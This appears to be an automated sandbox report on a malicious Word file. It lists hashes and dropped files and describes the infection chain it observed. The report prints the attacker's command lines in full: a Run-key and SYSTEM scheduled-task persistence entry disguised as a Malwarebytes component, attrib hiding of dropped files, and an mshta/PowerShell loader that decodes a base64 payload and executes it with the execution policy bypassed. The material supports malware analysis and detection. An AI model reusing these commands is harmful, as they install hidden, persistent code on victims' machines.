"powershell.exe" (Access type: "SETVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "MALWAREBYTESDK"; Value: "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs") - source
- Registry Access
- relevance
- 8/10
- ATT&CK ID
- T1060 (Show technique in the MITRE ATT&CK™ matrix)
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "%WINDIR%\System32\rsaenh.dll"
"WINWORD.EXE" touched file "%WINDIR%\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\System32\spool\drivers\x64\3\SendToOneNoteNames.gpd"
"WINWORD.EXE" touched file "%WINDIR%\System32\spool\drivers\x64\3\SendToOneNote.ini" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "C[q2WGiVQ6}.tN"
Pattern match: "qA.gJb/Uu"
Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/config/service"
Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter"
Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter"
Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/WQL"
Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/cimbinding/AssociationFilter"
Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/wsman/results"
Heuristic match: "wscript.echo L_Text_Msg_General01_Text & L_Space_Text & oDriver.Name"
Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/wmi"
Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2"
Pattern match: "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2"
Pattern match: "http://schemas.microsoft.com/wbem/wsman/1"
Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Service?Name=WinRM" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
d15aee026074fbd18f780fb51ec0632a.doc
- Filename
- d15aee026074fbd18f780fb51ec0632a.doc
- Size
- 960KiB (983040 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 12 11:20:00 2018, Last Saved Time/Date: Tue Feb 13 06:52:00 2018, Number of Pages: 1, Number of Words: 26, Number of Characters: 152, Security: 0
- Architecture
- WINDOWS
- SHA256
- af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102
- MD5
- d15aee026074fbd18f780fb51ec0632a
- SHA1
- 352687a98fb232e5614f7ce7cd57512553535915
- ssdeep
- 12288:5XxYnZLfy5r9uJxShtcfUK58ejANqsqZ/ZpUPNj+H8dUpKh4L1g1rX3:5X+NC9jhtUJuejkqNBp1jKR1
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 8 processes in total.
-
WINWORD.EXE
/n "C:\d15aee026074fbd18f780fb51ec0632a.doc"
(PID: 3212)
-
wscript.exe
"%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs"
(PID: 3392)
-
mshta.exe
vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));"",0 "))
(PID: 2844)
-
powershell.exe
-w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));
(PID: 3784, Additional Context: [System.Text.Encoding]::Unicode.GetString(FromBase64String((getontent %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))); ��\�{^�� -D�E#�8R &LC7� �>�#y�B�w�jv�z�S[System.Text.Encoding]::Unicode.GetString(FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))))
- attrib.exe +s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs (PID: 2372)
- attrib.exe +s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini (PID: 2640)
- schtasks.exe /Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareByteSDK /TR "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs" /F (PID: 3076)
-
powershell.exe
-w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));
(PID: 3784, Additional Context: [System.Text.Encoding]::Unicode.GetString(FromBase64String((getontent %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))); ��\�{^�� -D�E#�8R &LC7� �>�#y�B�w�jv�z�S[System.Text.Encoding]::Unicode.GetString(FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))))
-
mshta.exe
vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));"",0 "))
(PID: 2844)
-
wscript.exe
"%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs"
(PID: 3392)
- Setup.exe -Embedding (PID: 2948)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Clean 1
-
-
~_5aee026074fbd18f780fb51ec0632a.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/54
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
-
Informative Selection 2
-
-
ConfManagerNT.vbs
- Size
- 57KiB (58208 bytes)
- Type
- doc office
- Description
- Little-endian UTF-16 Unicode text, with very long lines
- Runtime Process
- wscript.exe (PID: 3392)
- MD5
- 41be15634bb46ae6a9bc797cad6c247a
- SHA1
- 151389f95d521a2aae1a0eadba9886f05136128b
- SHA256
- 3607432758176a2c41a1971b3c4d14a992a68b231851f8b81c6e816ea9ea29b2
-
ProjectConfManagerNT.ini
- Size
- 433KiB (443124 bytes)
- Type
- text
- Description
- Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 6cba575777b86ee511ee6f8ca1069c69
- SHA1
- db92bfe98bf909efecd1ebd7b5d1fb5f16643fe5
- SHA256
- c75b3b8d5996371fbe149d86276ebac0bdacebd813e127ca36e465ff12fba35c
-
-
Informative 12
-
-
d15aee026074fbd18f780fb51ec0632a.LNK
- Size
- 573B (573 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 8 13:20:27 2018, mtime=Sat Dec 8 13:20:27 2018, atime=Sat Dec 8 13:20:36 2018, length=983040, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 9b47d3475d5c0834fc8ef86eecd6222c
- SHA1
- ee1bef08126061aeeabbe6fc84e89f33df832f45
- SHA256
- 47866fe45fe0ed8d531e6fcbb085fa7af0cdaa86fba2fa09ef0361693f50f3ad
-
index.dat
- Size
- 160B (160 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 77f2fc3bb3b8e836e2eccd54bd4d0a79
- SHA1
- 2f19b3006d4c415e103f14bdb6ddf6432619eb76
- SHA256
- f5de60f27d76d5670d363d484efde7383b98baa81a72dbe62b5ee31e65d16596
-
17GPJA9KU9GW9OODB6Z0.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3784)
- MD5
- 5f61faebbc0b9eb2c01a8b7ab2707550
- SHA1
- a0af638a4496eafca0687101a8b6e124ff78150e
- SHA256
- 95ae34ca8941d1e781af68350dc18902134e83b2f0b3f5575aa8d1c39080d989
-
10201FDC.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- ce38d7842a557a35ee57f77deb7c6034
- SHA1
- c5df97bd8057a28a1e12d0f666f4b4bec9d2ba47
- SHA256
- d2a9e53f840cda2f26ea267fdc6bd5a875735ca6e210008155f093f75491d09c
-
BACF462D.wmf
- Size
- 370B (370 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 5f11918b90cd989c4b9877754e79cb58
- SHA1
- 7869e38dd2a29433c15484c1ef4e5fd0b7288e10
- SHA256
- f8875fb95b08d4aee63c107874994fb3fb8d59008abc88cb29041661ce0ba20e
-
MSForms.exd
- Size
- 163KiB (166724 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3212)
- MD5
- 98e2ae1936af0e0d4f073143bee1b39f
- SHA1
- b1f1113aecc1a5f2f40b8103f635511439493ade
- SHA256
- 4fea7f43673ec6817dba9c0af5447f9ac9deb223684076305a8a55531738b112
-
~WRS_12145297-CBEE-4101-BDC6-F8BD546DB9A4_.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- c537015894075562542dba0fc0e7d5e0
- SHA1
- 8f122da855b5258dbcb4bbb88bd1b7b0138bb9d3
- SHA256
- 670a0b9c88714122c15eb8927a55dc9c22eb10c99b10a08f0dcb9425bd846c95
-
~WRS_A3F12A40-44A8-4808-8AB8-97799042790C_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
SetupExe_20181208163200B84_.log
- Size
- 4.3KiB (4387 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- MD5
- 1e77557690d464826c37b0b8a6418867
- SHA1
- 71500938465f8fb76d452c25819a403ed61118f9
- SHA256
- 59e2c9790c8a95c92a576a0b0cf2231569ff3a62156b36eadd57cdb2f817bc4a
-
ExcludeDictionaryEN0409.lex
- Size
- 2B (2 bytes)
- Type
- text
- Description
- Little-endian UTF-16 Unicode text, with no line terminators
- MD5
- f3b25701fe362ec84616a93a45ce9998
- SHA1
- d62636d8caec13f04e28442a0a6fa1afeb024bbb
- SHA256
- b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
-
GimmeSetup_20181208163340B84_.log
- Size
- 49KiB (49961 bytes)
- Type
- text
- Description
- ASCII text, with very long lines, with CRLF line terminators
- MD5
- cc0c91b29c9747b4e3833444a5a8ea43
- SHA1
- 59777b245438d26ae7fa2cf586dc86202aa46f43
- SHA256
- fc0b0f0ff1abf111914d9b5988484bb5b602b1d790a85796211a0bf9c1da9924
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Network whitenoise filtering was applied
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Some low-level data is hidden, as this is only a slim report